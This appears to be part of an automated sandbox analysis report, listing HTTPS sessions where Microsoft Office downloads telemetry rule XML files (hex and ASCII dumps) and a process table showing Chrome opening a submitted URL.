                                            2024-12-03 08:58:13 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            79192.168.2.44982813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:13 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:13 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:13 GMT
                                            Content-Type: text/xml
                                            Content-Length: 411
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B989AF051"
                                            x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085813Z-174f7845968kvnqxhC1EWRmf3g0000000scg00000000av4w
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:13 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            80192.168.2.44982913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:13 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:13 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:13 GMT
                                            Content-Type: text/xml
                                            Content-Length: 470
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                            ETag: "0x8DC582BBB181F65"
                                            x-ms-request-id: b69fee9c-d01e-0028-6253-437896000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085813Z-174f78459685726chC1EWRsnbg00000015s0000000004xkt
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:13 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            81192.168.2.44983013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:13 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:13 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:13 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                            ETag: "0x8DC582BB556A907"
                                            x-ms-request-id: e12d29d9-601e-0001-6315-41faeb000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085813Z-174f7845968pght8hC1EWRyvxg00000008y0000000001602
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            82192.168.2.44983113.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:13 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:14 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:13 GMT
                                            Content-Type: text/xml
                                            Content-Length: 502
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                            ETag: "0x8DC582BB6A0D312"
                                            x-ms-request-id: 454be365-001e-0065-3d29-410b73000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085813Z-174f7845968qj8jrhC1EWRh41s00000015rg000000001s0t
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:14 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            83192.168.2.44983213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:14 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:15 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:15 GMT
                                            Content-Type: text/xml
                                            Content-Length: 407
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                            ETag: "0x8DC582B9D30478D"
                                            x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085815Z-174f78459685726chC1EWRsnbg00000015ng00000000af9v
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            84192.168.2.44983313.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:15 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:15 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:15 GMT
                                            Content-Type: text/xml
                                            Content-Length: 474
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                            ETag: "0x8DC582BB3F48DAE"
                                            x-ms-request-id: 306178df-a01e-001e-5af7-4449ef000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085815Z-174f784596886s2bhC1EWR743w00000015v0000000000wc6
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:15 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            85192.168.2.44983513.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:15 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:15 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:15 GMT
                                            Content-Type: text/xml
                                            Content-Length: 469
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                            ETag: "0x8DC582BB3CAEBB8"
                                            x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085815Z-174f7845968psccphC1EWRuz9s00000015y0000000005r0h
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:15 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            86192.168.2.44983413.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:15 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:16 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:15 GMT
                                            Content-Type: text/xml
                                            Content-Length: 408
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                            ETag: "0x8DC582BB9B6040B"
                                            x-ms-request-id: 15a89213-901e-0083-02aa-42bb55000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085815Z-174f7845968pf68xhC1EWRr4h80000001600000000002z4t
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:16 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            87192.168.2.44983613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:15 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:16 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:16 GMT
                                            Content-Type: text/xml
                                            Content-Length: 416
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                            ETag: "0x8DC582BB5284CCE"
                                            x-ms-request-id: 305230f7-c01e-00a1-7c4f-417e4a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085816Z-174f7845968swgbqhC1EWRmnb400000015sg0000000088xx
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:16 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                            Click to jump to process

                                            Click to jump to process

                                            Click to jump to process

                                            Target ID:0
                                            Start time:03:56:42
                                            Start date:03/12/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:2
                                            Start time:03:56:46
                                            Start date:03/12/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1804,i,6300371916976665629,12350350408107645027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:3
                                            Start time:03:56:52
                                            Start date:03/12/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dsiete.co/share.html"
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            No disassembly